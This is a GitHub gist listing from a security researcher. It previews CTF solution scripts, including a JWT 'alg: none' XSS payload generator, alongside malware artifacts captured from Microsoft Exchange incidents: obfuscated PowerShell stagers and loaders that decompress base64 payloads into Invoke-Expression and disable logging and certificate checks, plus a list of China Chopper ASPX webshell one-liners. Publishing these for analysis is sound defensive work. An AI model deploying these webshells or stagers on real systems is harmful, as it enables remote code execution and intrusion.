Skip to content

Instantly share code, notes, and snippets.

View JohnHammond's full-sized avatar

John Hammond JohnHammond

10.5k followers · 13 following
View GitHub Profile
@JohnHammond
JohnHammond / base64_blob.txt
Last active January 6, 2023 19:40
H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p
qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO
jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX
YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa
FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12
UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S
Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI
pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID
eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx
beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw
@JohnHammond
JohnHammond / powershell_architecture_check.ps1
Created May 3, 2021 23:06
if ([IntPtr]::Size -eq 4) {
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
}else{
$b='powershell.exe'
};
@JohnHammond
JohnHammond / get_flag.py
Created September 2, 2018 02:04
Codefest CTF 2018 "Polyglot" get_flag Script
#!/usr/bin/env python
import re
h = open('secret.c')
lines = [ x[:-1] for x in h.readlines() ] # remove newline char
h.close()
flag = []
for line in lines:
num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0')
@JohnHammond
JohnHammond / get_flag.sh
Created September 13, 2018 17:11
IceCTF 'ilovebees' Get Flag script
#!/bin/bash
exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file
for i in {00001..00109}
do
exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file
done
strings file | grep -i "IceCTF" --color=none | tail -n 1
@JohnHammond
JohnHammond / response.json
Created August 20, 2020 21:27
{
"Status": 0,
"TC": false,
"RD": true,
"RA": true,
"AD": false,
"CD": false,
"Question": [
{
"name": "dmarc.jqueryupdatejs.com.",
@JohnHammond
JohnHammond / attack.py
Created September 13, 2018 13:26
IceCTF "History of Computing" XSS Generator
#!/usr/bin/env python
first_piece = '{ "typ": "JWT", "alg": "none" }'
our_xss = '<script>alert("xss")</script>'
second_piece = '''
{ "username": "%s",
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \
% our_xss.replace('"','\\"')
@JohnHammond
JohnHammond / p.esonine.com_stager01.ps1
Created March 6, 2021 05:18
Microsoft Exchange Post-Exploitation
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1
@JohnHammond
JohnHammond / dns_pulldown.ps1
Created August 26, 2020 18:51
DNS Pulldown
0..4|%{try
{
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
$u=[System.Text.Encoding]::UTF8;
sAl er Get-Random;
$l=[System.Net.WebRequest];
sAL no New-Object;
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
$g::Expect100ConTINuE=0;
$g::ServerCertificateValidationCallback={1};
@JohnHammond
JohnHammond / china_chopper_source.csv
Created March 5, 2021 18:44
Microsoft Exchange Incident "China Chopper" ASPX Webshell source
We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.
# Occurrences, WebShell Source
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2
@JohnHammond
JohnHammond / p.estonine.com_stager02.ps1
Created March 6, 2021 05:21
Microsoft Exchange Post-Exploitation Artifacts 02
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
try{
$name = 'Global\PSEXEC'
$exeflag = $flase
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
}catch{}
$dt = Get-Date -Format 'yyMMdd'
$path = "$env:temp\\ccc.log"
[string]$flag = test-path $path